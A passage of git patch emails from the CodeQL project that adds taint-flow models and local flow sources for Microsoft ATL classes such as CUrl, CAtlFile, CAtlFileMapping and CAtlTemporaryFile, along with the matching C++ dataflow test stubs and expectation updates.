CUrl | atl.cpp:852:3:852:5 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:853:8:853:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | +| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:899:1:899:1 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:853:8:853:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:854:8:854:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:855:8:855:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:856:8:856:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:857:8:857:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:858:8:858:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:859:8:859:10 | url | | +| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:899:1:899:1 | url | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:865:5:865:8 | url2 | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:868:3:868:3 | url2 | | +| atl.cpp:863:11:863:13 | len | atl.cpp:866:29:866:31 | len | | +| atl.cpp:864:10:864:15 | buffer | atl.cpp:866:20:866:25 | buffer | | +| atl.cpp:864:10:864:15 | buffer | atl.cpp:867:10:867:15 | buffer | | +| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:868:3:868:3 | url2 | | +| atl.cpp:866:20:866:25 | ref arg buffer | atl.cpp:867:10:867:15 | buffer | | +| atl.cpp:866:28:866:31 | ref arg & ... | atl.cpp:866:29:866:31 | len [inner post update] | | +| atl.cpp:866:29:866:31 | len | atl.cpp:866:28:866:31 | & ... | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:871:5:871:8 | url2 | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:872:10:872:13 | url2 | | +| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:873:3:873:3 | url2 | | +| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:872:10:872:13 | url2 | | +| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:873:3:873:3 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:876:5:876:8 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:877:10:877:13 | url2 | | +| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:878:3:878:3 | url2 | | +| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:877:10:877:13 | url2 | | +| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:878:3:878:3 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:881:5:881:8 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:882:10:882:13 | url2 | | +| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:883:3:883:3 | url2 | | +| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:882:10:882:13 | url2 | | +| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:883:3:883:3 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:886:5:886:8 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:887:10:887:13 | url2 | | +| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:888:3:888:3 | url2 | | +| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:887:10:887:13 | url2 | | +| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:888:3:888:3 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:891:5:891:8 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:892:10:892:13 | url2 | | +| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:893:3:893:3 | url2 | | +| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:892:10:892:13 | url2 | | +| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:893:3:893:3 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:896:5:896:8 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:897:10:897:13 | url2 | | +| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:898:3:898:3 | url2 | | +| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:897:10:897:13 | url2 | | +| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:898:3:898:3 | url2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 300e3eaba681fc50ba0d9914e16267b7b22f1e33 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:09:22 +0000 Subject: [PATCH 0741/1267] C++: Add MaD model for 'CUrl'. --- cpp/ql/lib/ext/CUrl.model.yml | 21 ++++++++++++++ .../dataflow/taint-tests/atl.cpp | 28 +++++++++---------- 2 files changed, 35 insertions(+), 14 deletions(-) create mode 100644 cpp/ql/lib/ext/CUrl.model.yml diff --git a/cpp/ql/lib/ext/CUrl.model.yml b/cpp/ql/lib/ext/CUrl.model.yml new file mode 100644 index 00000000000..3a4f8fe2ff5 --- /dev/null +++ b/cpp/ql/lib/ext/CUrl.model.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # TODO this model can be improved a lot once we have MapKey content # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CUrl", True, "CUrl", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CUrl", True, "CrackUrl", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "CreateUrl", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CUrl", True, "GetExtraInfo", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetHostName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetPassword", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetSchemeName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetUrlPath", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "GetUserName", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CUrl", True, "SetExtraInfo", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetHostName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetPassword", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetSchemeName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetUrlPath", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "SetUserName", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CUrl", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 1727684b51a..de3df30b283 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -850,13 +850,13 @@ void test_CUrl() { char* x = indirect_source(); CUrl url; url.CrackUrl(x, 0); - sink(url); // $ MISSING: ir - sink(url.GetExtraInfo()); // $ MISSING: ir - sink(url.GetHostName()); // $ MISSING: ir - sink(url.GetPassword()); // $ MISSING: ir - sink(url.GetSchemeName()); // $ MISSING: ir - sink(url.GetUrlPath()); // $ MISSING: ir - sink(url.GetUserName()); // $ MISSING: ir + sink(url); // $ ir + sink(url.GetExtraInfo()); // $ ir + sink(url.GetHostName()); // $ ir + sink(url.GetPassword()); // $ ir + sink(url.GetSchemeName()); // $ ir + sink(url.GetUrlPath()); // $ ir + sink(url.GetUserName()); // $ ir { CUrl url2; @@ -864,36 +864,36 @@ void test_CUrl() { char buffer[1024]; url2.CrackUrl(x, 0); url2.CreateUrl(buffer, &len, 0); - sink(buffer); // $ ast MISSING: ir + sink(buffer); // $ ast ir } { CUrl url2; url2.SetExtraInfo(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetHostName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetPassword(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetSchemeName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetUrlPath(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } { CUrl url2; url2.SetUserName(x); - sink(url2); // $ MISSING: ir + sink(url2); // $ ir } } \ No newline at end of file From e73fccdb4a0251641c871c32d926b954522b8cc5 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:10:16 +0000 Subject: [PATCH 0742/1267] C++: Add more types that we'll need for later. --- .../dataflow/source-sink-tests/atl.cpp | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp new file mode 100644 index 00000000000..8b3174b8046 --- /dev/null +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -0,0 +1,56 @@ +typedef void* HANDLE; +typedef long LONG; +typedef LONG HRESULT; +typedef const char* LPCTSTR; +typedef unsigned long DWORD; +typedef unsigned long ULONG; +typedef void* PVOID; +typedef void* LPVOID; +typedef bool BOOL; +typedef const void* LPCVOID; +typedef unsigned long long ULONGLONG; +typedef long long LONGLONG; +typedef unsigned long* ULONG_PTR; +typedef char *LPTSTR; +typedef DWORD* LPDWORD; +typedef ULONG REGSAM; +typedef DWORD SECURITY_INFORMATION, *PSECURITY_INFORMATION; +typedef PVOID PSECURITY_DESCRIPTOR; +typedef struct _GUID { + unsigned long Data1; + unsigned short Data2; + unsigned short Data3; + unsigned char Data4[8]; +} GUID; +typedef GUID* REFGUID; + +typedef struct _SECURITY_ATTRIBUTES { + DWORD nLength; + LPVOID lpSecurityDescriptor; + BOOL bInheritHandle; +} SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES; + +typedef struct _FILETIME { + DWORD dwLowDateTime; + DWORD dwHighDateTime; +} FILETIME, *PFILETIME, *LPFILETIME; + +using size_t = decltype(sizeof(int)); +using SIZE_T = size_t; + +typedef struct _OVERLAPPED { + ULONG_PTR Internal; + ULONG_PTR InternalHigh; + union { + struct { + DWORD Offset; + DWORD OffsetHigh; + } DUMMYSTRUCTNAME; + PVOID Pointer; + } DUMMYUNIONNAME; + HANDLE hEvent; +} OVERLAPPED, *LPOVERLAPPED; + +using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); + +using HKEY = void*; From dee47f2111a3ae001ad69df7ba37a858bf287107 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:18:07 +0000 Subject: [PATCH 0743/1267] C++: Add a failing test with 'CAtlFile'. --- .../dataflow/source-sink-tests/atl.cpp | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 8b3174b8046..bcc75fe0bd1 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -54,3 +54,84 @@ typedef struct _OVERLAPPED { using LPOVERLAPPED_COMPLETION_ROUTINE = void(DWORD, DWORD, LPOVERLAPPED); using HKEY = void*; + +class CAtlTransactionManager; + +class CHandle { + CHandle() throw(); + CHandle(CHandle& h) throw(); + explicit CHandle(HANDLE h) throw(); +}; + +struct CAtlFile : public CHandle { + CAtlFile() throw(); + CAtlFile(CAtlTransactionManager* pTM) throw(); + CAtlFile(CAtlFile& file) throw(); + explicit CAtlFile(HANDLE hFile) throw(); + + HRESULT Create( + LPCTSTR szFilename, + DWORD dwDesiredAccess, + DWORD dwShareMode, + DWORD dwCreationDisposition, + DWORD dwFlagsAndAttributes, + LPSECURITY_ATTRIBUTES lpsa, + HANDLE hTemplateFile) throw(); + + HRESULT Flush() throw(); + HRESULT GetOverlappedResult( + LPOVERLAPPED pOverlapped, + DWORD& dwBytesTransferred, + BOOL bWait + ) throw(); + + HRESULT GetPosition(ULONGLONG& nPos) const throw(); + HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Seek( + LONGLONG nOffset, + DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped, + LPOVERLAPPED_COMPLETION_ROUTINE pfnCompletionRoutine) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + LPOVERLAPPED pOverlapped) throw(); +}; + +void test_CAtlFile() { + CAtlFile catFile; + char buffer[1024]; + catFile.Read(buffer, 1024); // $ MISSING: local_source +} From 74eae4a18dd1fa02e6256ea41e156b4c918ff9b6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:21:45 +0000 Subject: [PATCH 0744/1267] C++: Add a MaD model for 'CAtlFile' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlFile.model.yml | 9 +++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CAtlFile.qll | 17 +++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 2 +- 4 files changed, 28 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CAtlFile.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll diff --git a/cpp/ql/lib/ext/CAtlFile.model.yml b/cpp/ql/lib/ext/CAtlFile.model.yml new file mode 100644 index 00000000000..03584d62f03 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlFile.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlFile", True, "CAtlFile", "(CAtlFile &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CAtlFile", True, "CAtlFile", "(HANDLE)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index b371e6dc116..37c97dcca8d 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -53,3 +53,4 @@ private import implementations.Win32CommandExecution private import implementations.CA2AEX private import implementations.CComBSTR private import implementations.CPathT +private import implementations.CAtlFile diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll new file mode 100644 index 00000000000..6c01a29c539 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFile.qll @@ -0,0 +1,17 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFile` class from Microsoft's Active Template Library. + */ +class CAtlFile extends Class { + CAtlFile() { this.hasGlobalName("CAtlFile") } +} + +private class CAtlFileRead extends MemberFunction, LocalFlowSourceFunction { + CAtlFileRead() { this.getClassAndName("Read") instanceof CAtlFile } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isParameterDeref(0) and + description = "string read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index bcc75fe0bd1..2724e42aa34 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -133,5 +133,5 @@ struct CAtlFile : public CHandle { void test_CAtlFile() { CAtlFile catFile; char buffer[1024]; - catFile.Read(buffer, 1024); // $ MISSING: local_source + catFile.Read(buffer, 1024); // $ local_source } From ac0599cf75a4b1f50ca7fbe9317ded9bb2d136ba Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:24:35 +0000 Subject: [PATCH 0745/1267] C++: Add a failing test with 'CAtlFileMapping'. --- .../dataflow/source-sink-tests/atl.cpp | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 2724e42aa34..63d1bb17105 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -135,3 +135,47 @@ void test_CAtlFile() { char buffer[1024]; catFile.Read(buffer, 1024); // $ local_source } + +struct CAtlFileMappingBase { + CAtlFileMappingBase(CAtlFileMappingBase& orig); + CAtlFileMappingBase() throw(); + ~CAtlFileMappingBase() throw(); + + HRESULT CopyFrom(CAtlFileMappingBase& orig) throw(); + void* GetData() const throw(); + HANDLE GetHandle() throw (); + SIZE_T GetMappingSize() throw(); + + HRESULT MapFile( + HANDLE hFile, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT MapSharedMem( + SIZE_T nMappingSize, + LPCTSTR szName, + BOOL* pbAlreadyExisted, + LPSECURITY_ATTRIBUTES lpsa, + DWORD dwMappingProtection, + DWORD dwViewDesiredAccess) throw(); + + HRESULT OpenMapping( + LPCTSTR szName, + SIZE_T nMappingSize, + ULONGLONG nOffset, + DWORD dwViewDesiredAccess) throw(); + + HRESULT Unmap() throw(); +}; + +template +struct CAtlFileMapping : public CAtlFileMappingBase { + operator T*() const throw(); +}; + +void test_CAtlFileMapping(CAtlFileMapping mapping) { + char* data = static_cast(mapping); // $ MISSING: local_source + void* data2 = mapping.GetData(); // $ MISSING: local_source +} From 3709151353ecf426f73341a35d0642d5f91de93b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:31:12 +0000 Subject: [PATCH 0746/1267] C++: Add a MaD model for 'CAtlFileMappingBase' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlFileMappingBase.model.yml | 13 +++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../implementations/CAtlFileMapping.qll | 37 +++++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 4 +- 4 files changed, 53 insertions(+), 2 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlFileMappingBase.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll diff --git a/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml new file mode 100644 index 00000000000..dcf9fd6ca70 --- /dev/null +++ b/cpp/ql/lib/ext/CAtlFileMappingBase.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlFileMappingBase", True, "CAtlFileMappingBase", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CAtlFileMappingBase", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "GetData", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "GetHandle", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "MapFile", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "MapSharedMem", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "OpenMapping", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlFileMappingBase", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index 37c97dcca8d..f6ff93061af 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -54,3 +54,4 @@ private import implementations.CA2AEX private import implementations.CComBSTR private import implementations.CPathT private import implementations.CAtlFile +private import implementations.CAtlFileMapping diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll new file mode 100644 index 00000000000..85dae06806f --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlFileMapping.qll @@ -0,0 +1,37 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFileMapping` class from Microsoft's Active Template Library. + */ +class CAtlFileMapping extends Class { + CAtlFileMapping() { this.hasGlobalName("CAtlFileMapping") } +} + +/** + * The `CAtlFileMappingBase` class from Microsoft's Active Template Library. + */ +class CAtlFileMappingBase extends Class { + CAtlFileMappingBase() { this.hasGlobalName("CAtlFileMappingBase") } +} + +private class CAtlFileMappingBaseGetData extends MemberFunction, LocalFlowSourceFunction { + CAtlFileMappingBaseGetData() { + this.getClassAndName("GetData") = any(CAtlFileMappingBase fileMaping).getADerivedClass*() + } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isReturnValueDeref(1) and + description = "data read by " + this.getName() + } +} + +private class CAtlFileMappingGetData extends MemberFunction, LocalFlowSourceFunction { + CAtlFileMappingGetData() { + this.(ConversionOperator).getDeclaringType() instanceof CAtlFileMapping + } + + override predicate hasLocalFlowSource(FunctionOutput output, string description) { + output.isReturnValueDeref(1) and + description = "data read by " + this.getName() + } +} diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 63d1bb17105..8a9f9f0ea0a 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -176,6 +176,6 @@ struct CAtlFileMapping : public CAtlFileMappingBase { }; void test_CAtlFileMapping(CAtlFileMapping mapping) { - char* data = static_cast(mapping); // $ MISSING: local_source - void* data2 = mapping.GetData(); // $ MISSING: local_source + char* data = static_cast(mapping); // $ local_source + void* data2 = mapping.GetData(); // $ local_source } From 67ba85a0a3bf4c20f51fcf04c383fc876d48970c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:32:59 +0000 Subject: [PATCH 0747/1267] C++: Add failing tests for 'CAtlTemporaryFile'. --- .../dataflow/source-sink-tests/atl.cpp | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp index 8a9f9f0ea0a..3440940a4f0 100644 --- a/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/source-sink-tests/atl.cpp @@ -179,3 +179,39 @@ void test_CAtlFileMapping(CAtlFileMapping mapping) { char* data = static_cast(mapping); // $ local_source void* data2 = mapping.GetData(); // $ local_source } + +struct CAtlTemporaryFile { + CAtlTemporaryFile() throw(); + ~CAtlTemporaryFile() throw(); + HRESULT Close(LPCTSTR szNewName) throw(); + HRESULT Create(LPCTSTR pszDir, DWORD dwDesiredAccess) throw(); + HRESULT Flush() throw(); + HRESULT GetPosition(ULONGLONG& nPos) const throw(); + HRESULT GetSize(ULONGLONG& nLen) const throw(); + HRESULT HandsOff() throw(); + HRESULT HandsOn() throw(); + HRESULT LockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Read( + LPVOID pBuffer, + DWORD nBufSize, + DWORD& nBytesRead) throw(); + HRESULT Seek(LONGLONG nOffset, DWORD dwFrom) throw(); + + HRESULT SetSize(ULONGLONG nNewLen) throw(); + LPCTSTR TempFileName() throw(); + HRESULT UnlockRange(ULONGLONG nPos, ULONGLONG nCount) throw(); + + HRESULT Write( + LPCVOID pBuffer, + DWORD nBufSize, + DWORD* pnBytesWritten) throw(); + operator HANDLE() throw(); +}; + +void test_CAtlTemporaryFile() { + CAtlTemporaryFile file; + char buffer[1024]; + DWORD bytesRead; + file.Read(buffer, 1024, bytesRead); // $ MISSING: local_source +} From 33212da87621c003703992660b5ab524e38096eb Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 15:38:34 +0000 Subject: [PATCH 0748/1267] C++: Add a MaD model for 'CAtlTemporaryFile' and mark reads as local flow sources. --- cpp/ql/lib/ext/CAtlTemporaryFile.model.yml | 8 ++++++++ cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../implementations/CAtlTemporaryFile.qll | 17 +++++++++++++++++ .../dataflow/source-sink-tests/atl.cpp | 2 +- 4 files changed, 27 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CAtlTemporaryFile.model.yml create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll diff --git a/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml new file mode 100644 index 00000000000..71a05266a2d --- /dev/null +++ b/cpp/ql/lib/ext/CAtlTemporaryFile.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlTemporaryFile", True, "Create", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CAtlTemporaryFile", True, "Read", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CAtlTemporaryFile", True, "Write", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index f6ff93061af..cd86b53f90e 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -55,3 +55,4 @@ private import implementations.CComBSTR private import implementations.CPathT private import implementations.CAtlFile private import implementations.CAtlFileMapping +private import implementations.CAtlTemporaryFile diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll new file mode 100644 index 00000000000..cc3a36d0fbd --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CAtlTemporaryFile.qll @@ -0,0 +1,17 @@ +import semmle.code.cpp.models.interfaces.FlowSource + +/** + * The `CAtlFile` class from Microsoft's Active Template Library. + */ +class CAtlTemporaryFile extends Class { + CAtlTemporaryFile() { this.hasGlobalName("CAtlTemporaryFile") } +} + +private class CAtlTemporaryFileRead extends MemberFunction, 